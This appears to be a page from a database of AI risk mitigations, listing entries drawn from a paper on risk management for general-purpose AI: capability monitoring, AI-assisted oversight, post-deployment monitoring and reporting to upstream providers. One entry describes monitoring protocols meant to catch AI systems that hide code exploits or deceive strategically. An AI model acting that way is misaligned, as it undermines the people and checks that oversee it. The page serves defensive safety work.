This page is still being polished. If you have thoughts, please share them via the feedback form.
Data on this page is preliminary and may change. Please do not share or cite these figures publicly.
Cannot be confidently classified due to insufficient information, excessive vagueness, or ambiguity.
Reasoning
Mitigation name "Monitoring" lacks definition and evidence; cannot identify focal activity or where it occurs.
Deployment
Monitoring of model capabilities
AI models are often trained to develop specific capabilities by using appropriate training data and training goals. However, models may develop capabilities that they were not specifically trained for. One subset of this is emergent capabilities, i.e., capabilities that emerged in larger models but not smaller models given a similar training process [215]. These capabilities can be monitored, allowing models to be tested not only for their intended capabilities but also for capabilities that are not intended.
2.2.2 Testing & EvaluationAI model-assisted oversight of AI systems
AI model-assisted oversight can help monitor and supervise the training of increasingly capable GPAI systems, which may become difficult to oversee at scale by human supervisors during training or testing. Monitoring and supervision may become especially difficult in cases where increasingly advanced GPAIs perform near or above human level in some specialized domains, where supervision quality might fail to keep pace with capabilities improvement. The training signal may include labeled data, reward function, and user feedback on produced outputs.
1.1.2 Learning ObjectivesPost-deployment ongoing monitoring for unexpected use cases
Ongoing monitoring of AI systems can uncover emergent or newly identified capabilities and limitations, in particular when new use cases are found, or in a large-scale deployment with a diverse population of users. These new capabilities or limitations can inform ongoing risk analysis. New use-cases can be discovered via monitoring publications, online forums, or APIs [131]. For example, a LLM might have unexpectedly high competence at giving convincing medical advice, despite not being directly developed for that purpose, nor verified for accuracy. In that case, the potential risks of this newly found competence can be assessed
2.3.3 Monitoring & LoggingMonitoring protocols for potentially adversarial GPAI systems
Similar to cybersecurity protocols, AI providers can prepare in advance for potential adversarial action from AI systems by developing and stress-testing protocols for potential adversarial action [179]. Such adversarial action may range from hiding code exploits, to strategic deception or loss of control related behaviors. AI systems may be adversarial due to malicious actors (e.g., data poisoning), or due to unintended issues of control (lack of alignment with human intent). Alongside improving the system alignment, external monitoring and restrictions may be deployed in advance to “catch” these adversarial model malfunctions before harm is done. Like with cybersecurity red teaming, any protocol which assumes adversarial action can be stress tested in advance. For example, this can be done by projecting the plausible capabilities and affordances of the adversarial actor (e.g., in the case of a tech company - a hacker, or a disgruntled employee). From this process, measures that better anticipate possible adversarial action can be deployed, and catch unsuccessful attempts at adversarial behavior. If such unsuccessful attempts are caught, they can be reported in incident reports, and serve as an input to further risk analysis. Depending on their severity, it may be advisable to recall the system if deployed.
1.2 Non-ModelEncouraging downstream provider to evaluate models for deployment-specific failure modes
In some cases, AI system deployers are better positioned to perform certain risk management measures on the AI model in a provided AI system, relative to upstream model providers. For example, they understand their use case better and are more easily able to predict foreseeable misuse or failure modes. These evaluations can inform upstream model providers, or inform supplementary mitigations by the deployer.
3.3.1 Industry CoordinationEncourage reporting of critical vulnerabilities to the upstream provider or other relevant stakeholders
Downstream AI system deployers can report critical vulnerabilities or incidents to the upstream model provider and other relevant regulators. This can contribute to safe use, and allow other downstream deployers to be informed about any potential problems.
3.3.1 Industry CoordinationModel development
2.4 Engineering & DevelopmentModel development > Data-related
1.1 ModelModel evaluations
2.2.2 Testing & EvaluationModel evaluations > General evaluations
2.2.2 Testing & EvaluationModel evaluations > Benchmarking
3.2.1 Benchmarks & EvaluationModel evaluations > Red teaming
2.2.2 Testing & EvaluationRisk Sources and Risk Management Measures in Support of Standards for General-Purpose AI Systems
Gipiškis, Rokas; San Joaquin, Ayrton; Chin, Ze Shen; Regenfuß, Adrian; Gil, Ariel; Holtman, Koen (2024)
Organizations and governments that develop, deploy, use, and govern AI must coordinate on effective risk mitigation. However, the landscape of AI risk mitigation frameworks is fragmented, uses inconsistent terminology, and has gaps in coverage. This paper introduces a preliminary AI Risk Mitigation Taxonomy to organize AI risk mitigations and provide a common frame of reference. The Taxonomy was developed through a rapid evidence scan of 13 AI risk mitigation frameworks published between 2023-2025, which were extracted into a living database of 831 distinct AI risk mitigations.
Operate and Monitor
Running, maintaining, and monitoring the AI system post-deployment
Deployer
Entity that integrates and deploys the AI system for end users
Measure
Quantifying, testing, and monitoring identified AI risks